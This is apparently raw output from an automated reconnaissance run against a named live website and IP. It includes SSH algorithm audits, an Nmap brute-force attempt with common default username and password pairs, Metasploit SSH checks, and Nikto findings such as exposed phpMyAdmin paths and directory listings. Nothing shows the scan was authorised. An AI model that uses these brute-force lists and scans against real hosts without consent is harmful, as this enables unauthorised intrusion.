2847. (mac) hmac-md5-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2848. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2849. `- [warn] using weak hashing algorithm
2850. `- [info] available since OpenSSH 6.2
2851. (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
2852. `- [info] available since OpenSSH 6.2
2853. (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
2854. `- [info] available since OpenSSH 6.2
2855. (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
2856. (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
2857. (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
2858. (mac) hmac-ripemd160-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2859. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2860. `- [info] available since OpenSSH 6.2
2861. (mac) hmac-sha1-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2862. `- [warn] using weak hashing algorithm
2863. `- [info] available since OpenSSH 6.2
2864. (mac) hmac-md5-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2865. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2866. `- [warn] using weak hashing algorithm
2867. `- [info] available since OpenSSH 6.2
2868. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2869. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2870. `- [warn] using encrypt-and-MAC mode
2871. `- [warn] using weak hashing algorithm
2872. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2873. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2874. `- [warn] using weak hashing algorithm
2875. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2876. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2877. `- [warn] using small 64-bit tag size
2878. `- [info] available since OpenSSH 4.7
2879. (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
2880. `- [info] available since OpenSSH 6.2
2881. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2882. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2883. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2884. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2885. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2886. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2887. `- [warn] using encrypt-and-MAC mode
2888. `- [info] available since OpenSSH 2.5.0
2889. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2890. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2891. `- [warn] using encrypt-and-MAC mode
2892. `- [info] available since OpenSSH 2.1.0
2893. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2894. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2895. `- [warn] using encrypt-and-MAC mode
2896. `- [warn] using weak hashing algorithm
2897. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
2898. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2899. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2900. `- [warn] using encrypt-and-MAC mode
2901. `- [warn] using weak hashing algorithm
2902. `- [info] available since OpenSSH 2.5.0
2903.  
2904. # algorithm recommendations (for OpenSSH 6.6.1)
2905. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2906. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
2907. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
2908. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
2909. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
2910. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
2911. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
2912. (rec) -arcfour -- enc algorithm to remove
2913. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
2914. (rec) -blowfish-cbc -- enc algorithm to remove
2915. (rec) -3des-cbc -- enc algorithm to remove
2916. (rec) -aes256-cbc -- enc algorithm to remove
2917. (rec) -arcfour256 -- enc algorithm to remove
2918. (rec) -cast128-cbc -- enc algorithm to remove
2919. (rec) -aes192-cbc -- enc algorithm to remove
2920. (rec) -arcfour128 -- enc algorithm to remove
2921. (rec) -aes128-cbc -- enc algorithm to remove
2922. (rec) -hmac-sha2-512 -- mac algorithm to remove
2923. (rec) -hmac-md5-96 -- mac algorithm to remove
2924. (rec) -hmac-md5-etm@openssh.com -- mac algorithm to remove
2925. (rec) -hmac-sha1-96-etm@openssh.com -- mac algorithm to remove
2926. (rec) -hmac-ripemd160-etm@openssh.com -- mac algorithm to remove
2927. (rec) -hmac-md5-96-etm@openssh.com -- mac algorithm to remove
2928. (rec) -hmac-sha2-256 -- mac algorithm to remove
2929. (rec) -hmac-ripemd160 -- mac algorithm to remove
2930. (rec) -umac-128@openssh.com -- mac algorithm to remove
2931. (rec) -hmac-sha1-96 -- mac algorithm to remove
2932. (rec) -umac-64@openssh.com -- mac algorithm to remove
2933. (rec) -hmac-md5 -- mac algorithm to remove
2934. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
2935. (rec) -hmac-sha1 -- mac algorithm to remove
2936. (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
2937. (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
2938.  
2939.  
2940. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 03:27 EDT
2941. NSE: [ssh-run] Failed to specify credentials and command to run.
2942. NSE: [ssh-brute] Trying username/password pair: root:root
2943. NSE: [ssh-brute] Trying username/password pair: admin:admin
2944. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
2945. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
2946. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
2947. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
2948. NSE: [ssh-brute] Trying username/password pair: guest:guest
2949. NSE: [ssh-brute] Trying username/password pair: user:user
2950. NSE: [ssh-brute] Trying username/password pair: web:web
2951. NSE: [ssh-brute] Trying username/password pair: test:test
2952. NSE: [ssh-brute] Trying username/password pair: root:
2953. NSE: [ssh-brute] Trying username/password pair: admin:
2954. NSE: [ssh-brute] Trying username/password pair: administrator:
2955. NSE: [ssh-brute] Trying username/password pair: webadmin:
2956. NSE: [ssh-brute] Trying username/password pair: sysadmin:
2957. NSE: [ssh-brute] Trying username/password pair: netadmin:
2958. NSE: [ssh-brute] Trying username/password pair: guest:
2959. NSE: [ssh-brute] Trying username/password pair: user:
2960. NSE: [ssh-brute] Trying username/password pair: web:
2961. NSE: [ssh-brute] Trying username/password pair: test:
2962. NSE: [ssh-brute] Trying username/password pair: root:123456
2963. NSE: [ssh-brute] Trying username/password pair: admin:123456
2964. NSE: [ssh-brute] Trying username/password pair: administrator:123456
2965. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
2966. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
2967. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
2968. NSE: [ssh-brute] Trying username/password pair: guest:123456
2969. NSE: [ssh-brute] Trying username/password pair: user:123456
2970. NSE: [ssh-brute] Trying username/password pair: web:123456
2971. NSE: [ssh-brute] Trying username/password pair: test:123456
2972. NSE: [ssh-brute] Trying username/password pair: root:12345
2973. NSE: [ssh-brute] Trying username/password pair: admin:12345
2974. NSE: [ssh-brute] Trying username/password pair: administrator:12345
2975. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
2976. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
2977. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
2978. NSE: [ssh-brute] Trying username/password pair: guest:12345
2979. NSE: [ssh-brute] Trying username/password pair: user:12345
2980. NSE: [ssh-brute] Trying username/password pair: web:12345
2981. NSE: [ssh-brute] Trying username/password pair: test:12345
2982. NSE: [ssh-brute] Trying username/password pair: root:123456789
2983. NSE: [ssh-brute] Trying username/password pair: admin:123456789
2984. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
2985. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
2986. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
2987. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
2988. NSE: [ssh-brute] Trying username/password pair: guest:123456789
2989. NSE: [ssh-brute] Trying username/password pair: user:123456789
2990. NSE: [ssh-brute] Trying username/password pair: web:123456789
2991. NSE: [ssh-brute] Trying username/password pair: test:123456789
2992. NSE: [ssh-brute] Trying username/password pair: root:password
2993. NSE: [ssh-brute] Trying username/password pair: admin:password
2994. NSE: [ssh-brute] Trying username/password pair: administrator:password
2995. NSE: [ssh-brute] Trying username/password pair: webadmin:password
2996. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
2997. NSE: [ssh-brute] Trying username/password pair: netadmin:password
2998. NSE: [ssh-brute] Trying username/password pair: guest:password
2999. NSE: [ssh-brute] Trying username/password pair: user:password
3000. NSE: [ssh-brute] Trying username/password pair: web:password
3001. NSE: [ssh-brute] Trying username/password pair: test:password
3002. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
3003. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
3004. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
3005. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
3006. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
3007. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
3008. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
3009. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
3010. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
3011. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
3012. NSE: [ssh-brute] Trying username/password pair: root:princess
3013. NSE: [ssh-brute] Trying username/password pair: admin:princess
3014. NSE: [ssh-brute] Trying username/password pair: administrator:princess
3015. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
3016. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
3017. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
3018. NSE: [ssh-brute] Trying username/password pair: guest:princess
3019. NSE: [ssh-brute] Trying username/password pair: user:princess
3020. NSE: [ssh-brute] Trying username/password pair: web:princess
3021. NSE: [ssh-brute] Trying username/password pair: test:princess
3022. NSE: [ssh-brute] Trying username/password pair: root:12345678
3023. NSE: [ssh-brute] Trying username/password pair: admin:12345678
3024. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
3025. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
3026. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
3027. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
3028. NSE: [ssh-brute] Trying username/password pair: guest:12345678
3029. NSE: [ssh-brute] Trying username/password pair: user:12345678
3030. NSE: [ssh-brute] Trying username/password pair: web:12345678
3031. NSE: [ssh-brute] Trying username/password pair: test:12345678
3032. NSE: [ssh-brute] Trying username/password pair: root:1234567
3033. NSE: [ssh-brute] Trying username/password pair: admin:1234567
3034. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
3035. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
3036. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
3037. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
3038. NSE: [ssh-brute] Trying username/password pair: guest:1234567
3039. NSE: [ssh-brute] Trying username/password pair: user:1234567
3040. NSE: [ssh-brute] Trying username/password pair: web:1234567
3041. NSE: [ssh-brute] Trying username/password pair: test:1234567
3042. NSE: [ssh-brute] Trying username/password pair: root:abc123
3043. NSE: [ssh-brute] Trying username/password pair: admin:abc123
3044. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
3045. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
3046. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
3047. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
3048. NSE: [ssh-brute] Trying username/password pair: guest:abc123
3049. NSE: [ssh-brute] Trying username/password pair: user:abc123
3050. NSE: [ssh-brute] Trying username/password pair: web:abc123
3051. NSE: [ssh-brute] Trying username/password pair: test:abc123
3052. NSE: [ssh-brute] Trying username/password pair: root:nicole
3053. NSE: [ssh-brute] Trying username/password pair: admin:nicole
3054. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
3055. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
3056. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
3057. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
3058. NSE: [ssh-brute] Trying username/password pair: guest:nicole
3059. NSE: [ssh-brute] Trying username/password pair: user:nicole
3060. NSE: [ssh-brute] Trying username/password pair: web:nicole
3061. NSE: [ssh-brute] Trying username/password pair: test:nicole
3062. NSE: [ssh-brute] Trying username/password pair: root:daniel
3063. NSE: [ssh-brute] Trying username/password pair: admin:daniel
3064. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
3065. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
3066. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
3067. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
3068. NSE: [ssh-brute] Trying username/password pair: guest:daniel
3069. NSE: [ssh-brute] Trying username/password pair: user:daniel
3070. NSE: [ssh-brute] Trying username/password pair: web:daniel
3071. NSE: [ssh-brute] Trying username/password pair: test:daniel
3072. NSE: [ssh-brute] Trying username/password pair: root:monkey
3073. NSE: [ssh-brute] Trying username/password pair: admin:monkey
3074. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
3075. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
3076. Nmap scan report for candydollchan.net (91.219.29.120)
3077. Host is up (0.13s latency).
3078. rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
3079.  
3080. PORT STATE SERVICE VERSION
3081. 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
3082. | ssh-auth-methods:
3083. | Supported authentication methods:
3084. | publickey
3085. | gssapi-keyex
3086. | gssapi-with-mic
3087. |_ password
3088. | ssh-brute:
3089. | Accounts: No valid accounts found
3090. |_ Statistics: Performed 132 guesses in 195 seconds, average tps: 0.5
3091. | ssh-hostkey:
3092. | 2048 2b:d0:38:0e:ca:11:3f:76:6c:5b:84:c1:e6:f2:1b:6c (RSA)
3093. | 256 2b:b6:42:1b:ac:af:99:36:a4:f0:7b:89:17:bb:ec:81 (ECDSA)
3094. |_ 256 88:ff:8e:62:bc:e6:75:1c:c0:06:72:75:e6:c4:66:57 (EdDSA)
3095. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
3096. |_ssh-run: Failed to specify credentials and command to run.
3097. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3098. Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 2.6.18 (91%), Linux 3.10 (91%), Linux 4.0 (91%), Linux 2.6.39 (91%), Linux 3.10 - 4.8 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.8 (90%)
3099. No exact OS matches for host (test conditions non-ideal).
3100. Network Distance: 12 hops
3101.  
3102. TRACEROUTE (using port 22/tcp)
3103. HOP RTT ADDRESS
3104. 1 495.27 ms 10.13.0.1
3105. 2 ...
3106. 3 942.09 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
3107. 4 ...
3108. 5 946.82 ms be100-1108.ams-1-a9.nl.eu (213.186.32.211)
3109. 6 957.84 ms be100-1166.var-5-a9.pl.eu (91.121.215.191)
3110. 7 ...
3111. 8 37.60 ms ae0-1.RT1.NTL.KIV.UA.retn.net (87.245.233.213)
3112. 9 159.54 ms GW-Fiberax.retn.net (87.245.237.118)
3113. 10 47.77 ms 195.177.68.94
3114. 11 47.79 ms runa.lucky.net (193.193.193.45)
3115. 12 47.78 ms 120.29.219.91.colo.ukrservers.com (91.219.29.120)
3116.  
3117. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
3118. RHOSTS => candydollchan.net
3119. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
3120. RHOST => candydollchan.net
3121. [*] 91.219.29.120:22 - SSH - Checking for false positives
3122. [-] 91.219.29.120:22 - SSH - throws false positive results. Aborting.
3123. [*] Scanned 1 of 1 hosts (100% complete)
3124. [*] Auxiliary module execution completed
3125. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
3126. [+] 91.219.29.120:22 - SSH server version: SSH-2.0-OpenSSH_6.6.1 ( service.version=6.6.1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
3127. [*] candydollchan.net:22 - Scanned 1 of 1 hosts (100% complete)
3128. [*] Auxiliary module execution completed
3129.  + -- --=[Port 23 closed... skipping.
3130.  + -- --=[Port 25 closed... skipping.
3131.  + -- --=[Port 53 closed... skipping.
3132.  + -- --=[Port 79 closed... skipping.
3133.  + -- --=[Port 80 opened... running tests...
3134.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
3135.  
3136. ^ ^
3137. _ __ _ ____ _ __ _ _ ____
3138. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
3139. | V V // o // _/ | V V // 0 // 0 // _/
3140. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
3141. <
3142. ...'
3143.  
3144. WAFW00F - Web Application Firewall Detection Tool
3145.  
3146. By Sandro Gauci && Wendel G. Henrique
3147.  
3148. Checking http://candydollchan.net
3149. Generic Detection results:
3150. No WAF detected by the generic detection
3151. Number of requests: 13
3152.  
3153.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
3154. http://candydollchan.net [200 OK] AddThis, Country[UKRAINE][UA], HTTPServer[nginx/1.10.2], IP[91.219.29.120], Script[text/javascript], Title[Candydoll Downloads - Candydollchan], nginx[1.10.2]
3155.  
3156.  __ ______ _____ 
3157.  \ \/ / ___|_ _|
3158.  \ /\___ \ | | 
3159.  / \ ___) || | 
3160.  /_/\_|____/ |_| 
3161.  
3162. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
3163. + -- --=[Target: candydollchan.net:80
3164. + -- --=[Site not vulnerable to Cross-Site Tracing!
3165. + -- --=[Site not vulnerable to Host Header Injection!
3166.  
3167.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
3168. + -- --=[Checking if X-Content options are enabled on candydollchan.net... 
3169.  
3170. + -- --=[Checking if X-Frame options are enabled on candydollchan.net... 
3171.  
3172. + -- --=[Checking if X-XSS-Protection header is enabled on candydollchan.net... 
3173.  
3174. + -- --=[Checking HTTP methods on candydollchan.net... 
3175. Allow: GET,HEAD,POST,OPTIONS
3176.  
3177. + -- --=[Checking if TRACE method is enabled on candydollchan.net... 
3178.  
3179. + -- --=[Checking for META tags on candydollchan.net... 
3180. <meta http-equiv="Pragma" content="no-cache" />
3181. <meta http-equiv="cache-control" content="no-cache" />
3182. <meta name="Robots" content="index,follow">
3183. <meta http-equiv="expires" content="Sat, 17 Mar 1990 00:00:01 GMT" />
3184. <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
3185. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
3186.  
3187. + -- --=[Checking for open proxy on candydollchan.net... 
3188. <html><head><title>Shared IP</title></head>
3189. <body><center>This IP is being shared among many domains.<br>
3190. To view the domain you are looking for, simply enter the domain name in the location bar of your web browser.<br>
3191. </center></body>
3192. </html>
3193. + -- --=[Enumerating software on candydollchan.net... 
3194. Server: nginx/1.10.2
3195.  
3196. + -- --=[Checking if Strict-Transport-Security is enabled on candydollchan.net... 
3197.  
3198. + -- --=[Checking for Flash cross-domain policy on candydollchan.net... 
3199.  
3200. + -- --=[Checking for Silverlight cross-domain policy on candydollchan.net... 
3201.  
3202. + -- --=[Checking for HTML5 cross-origin resource sharing on candydollchan.net... 
3203.  
3204. + -- --=[Retrieving robots.txt on candydollchan.net... 
3205. User-agent: *
3206. Disallow:
3207. Host: candydollchan.net
3208. Sitemap: http://candydollchan.net/sitemap.xml
3209. + -- --=[Retrieving sitemap.xml on candydollchan.net... 
3210. </url>
3211. <url>
3212. <loc>http://candydollchan.net/res/14.html</loc>
3213. <changefreq>daily</changefreq>
3214. </url>
3215. <url>
3216. <loc>http://candydollchan.net/res/562.html</loc>
3217. <changefreq>daily</changefreq>
3218. </url>
3219. </urlset>
3220. + -- --=[Checking cookie attributes on candydollchan.net... 
3221.  
3222. + -- --=[Checking for ASP.NET Detailed Errors on candydollchan.net... 
3223.  
3224. 
3225.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
3226. - Nikto v2.1.6
3227. ---------------------------------------------------------------------------
3228. + Target IP: 91.219.29.120
3229. + Target Hostname: candydollchan.net
3230. + Target Port: 80
3231. + Start Time: 2017-10-27 03:33:04 (GMT-4)
3232. ---------------------------------------------------------------------------
3233. + Server: nginx/1.10.2
3234. + The anti-clickjacking X-Frame-Options header is not present.
3235. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
3236. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
3237. + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x5d 0x52718ec7f0900
3238. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
3239. + Retrieved x-powered-by header: PHP/5.3.29
3240. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
3241. + OSVDB-3268: /lib/: Directory indexing found.
3242. + OSVDB-3092: /lib/: This might be interesting...
3243. + Uncommon header 'x-ob_mode' found, with contents: 1
3244. + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
3245. + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
3246. + OSVDB-3092: /pma/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
3247. + OSVDB-3268: /src/: Directory indexing found.
3248. + Cookie SQMSESSID created without the httponly flag
3249. + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
3250. + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
3251. + OSVDB-3268: /icons/: Directory indexing found.
3252. + OSVDB-3233: /icons/README: Apache default file found.
3253. + OSVDB-3268: /pt/: Directory indexing found.
3254. + OSVDB-3092: /pt/: This might be interesting... potential country code (Portugal)
3255. + Cookie proton created without the httponly flag
3256. + Cookie fav created without the httponly flag
3257. + /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
3258. + 9220 requests: 0 error(s) and 24 item(s) reported on remote host
3259. + End Time: 2017-10-27 04:56:53 (GMT-4) (5029 seconds)
3260. ---------------------------------------------------------------------------
3261. + 1 host(s) tested
3262.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
3263. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/candydollchan.net-port80.jpg
3264.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
3265.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
3266.  
3267.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
3268.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
3269.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
3270.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
3271.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
3272.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
3273.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
3274.  
3275. __[ ! ] Neither war between hackers, nor peace for the system.
3276. __[ ! ] http://blog.inurl.com.br
3277. __[ ! ] http://fb.com/InurlBrasil
3278. __[ ! ] http://twitter.com/@googleinurl
3279. __[ ! ] http://github.com/googleinurl
3280. __[ ! ] Current PHP version::[ 7.0.22-3 ]
3281. __[ ! ] Current script owner::[ root ]
3282. __[ ! ] Current uname::[ Linux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-2kali1 (2017-10-16) x86_64 ]
3283. __[ ! ] Current pwd::[ /usr/share/sniper ]
3284. __[ ! ] Help: php inurlbr.php --help
3285. ------------------------------------------------------------------------------------------------------------------------
3286.  
3287. [ ! ] Starting SCANNER INURLBR 2.1 at [27-10-2017 04:57:52]
3288. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
3289. It is the end user's responsibility to obey all applicable local, state and federal laws.
3290. Developers assume no liability and are not responsible for any misuse or damage caused by this program
3291.  
3292. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-candydollchan.net.txt ]
3293. [ INFO ][ DORK ]::[ site:candydollchan.net ]
3294. [ INFO ][ SEARCHING ]:: {
3295. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.nr ]
3296.  
3297. [ INFO ][ SEARCHING ]:: 
3298. -[:::]
3299. [ INFO ][ ENGINE ]::[ GOOGLE API ]
3300.  
3301. [ INFO ][ SEARCHING ]:: 
3302. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3303. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.af ID: 006688160405527839966:yhpefuwybre ]
3304. [ INFO ][ SEARCHING ]:: 
3305. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3306. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
3307. [ INFO ] Not a satisfactory result was found!
3308. [ INFO ] [ Shutting down ]
3309. [ INFO ] [ End of process INURLBR at [27-10-2017 04:58:03]
3310. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3311. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-candydollchan.net.txt ]
3312. |_________________________________________________________________________________________
3313.  
3314. \_________________________________________________________________________________________/
3315.  
3316.  + -- --=[Port 110 closed... skipping.
3317.  + -- --=[Port 111 closed... skipping.
3318.  + -- --=[Port 135 closed... skipping.
3319.  + -- --=[Port 139 closed... skipping.
3320.  + -- --=[Port 161 closed... skipping.
3321.  + -- --=[Port 162 closed... skipping.
3322.  + -- --=[Port 389 closed... skipping.
3323.  + -- --=[Port 443 closed... skipping.
3324.  + -- --=[Port 445 closed... skipping.
3325.  + -- --=[Port 512 closed... skipping.
3326.  + -- --=[Port 513 closed... skipping.
3327.  + -- --=[Port 514 closed... skipping.
3328.  + -- --=[Port 623 closed... skipping.
3329.  + -- --=[Port 624 closed... skipping.
3330.  + -- --=[Port 1099 closed... skipping.
3331.  + -- --=[Port 1433 closed... skipping.
3332.  + -- --=[Port 2049 closed... skipping.
3333.  + -- --=[Port 2121 closed... skipping.
3334.  + -- --=[Port 3306 closed... skipping.
3335.  + -- --=[Port 3310 closed... skipping.
3336.  + -- --=[Port 3128 closed... skipping.
3337.  + -- --=[Port 3389 closed... skipping.
3338.  + -- --=[Port 3632 closed... skipping.
3339.  + -- --=[Port 4443 closed... skipping.
3340.  + -- --=[Port 5432 closed... skipping.
3341.  + -- --=[Port 5800 closed... skipping.
3342.  + -- --=[Port 5900 closed... skipping.
3343.  + -- --=[Port 5984 closed... skipping.
3344.  + -- --=[Port 6000 closed... skipping.
3345.  + -- --=[Port 6667 closed... skipping.
3346.  + -- --=[Port 8000 closed... skipping.
3347.  + -- --=[Port 8100 closed... skipping.
3348.  + -- --=[Port 8080 closed... skipping.
3349.  + -- --=[Port 8180 closed... skipping.
3350.  + -- --=[Port 8443 closed... skipping.
3351.  + -- --=[Port 8888 closed... skipping.
3352.  + -- --=[Port 10000 closed... skipping.
3353.  + -- --=[Port 16992 closed... skipping.
3354.  + -- --=[Port 27017 closed... skipping.
3355.  + -- --=[Port 27018 closed... skipping.
3356.  + -- --=[Port 27019 closed... skipping.
3357.  + -- --=[Port 28017 closed... skipping.
3358.  + -- --=[Port 49152 closed... skipping.
3359.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
3360. #########################################################################################
3361. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
3362. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
3363. `888. .8' .88888. Y88bo. 888 8 888 888
3364. `888.8' .8' `888. `ZY8888o. 888 8 888 888
3365. `888' .88ooo8888. `0Y88b 888 8 888 888
3366. 888 .8' `888. oo .d8P `88. .8' `88b d88'
3367. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
3368. Welcome to Yasuo v2.3
3369. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
3370. #########################################################################################
3371.  
3372. I, [2017-10-27T04:58:06.006355 #8161] INFO -- : Initiating port scan
3373. I, [2017-10-27T04:59:23.817988 #8161] INFO -- : Using nmap scan output file logs/nmap_output_2017-10-27_04-58-06.xml
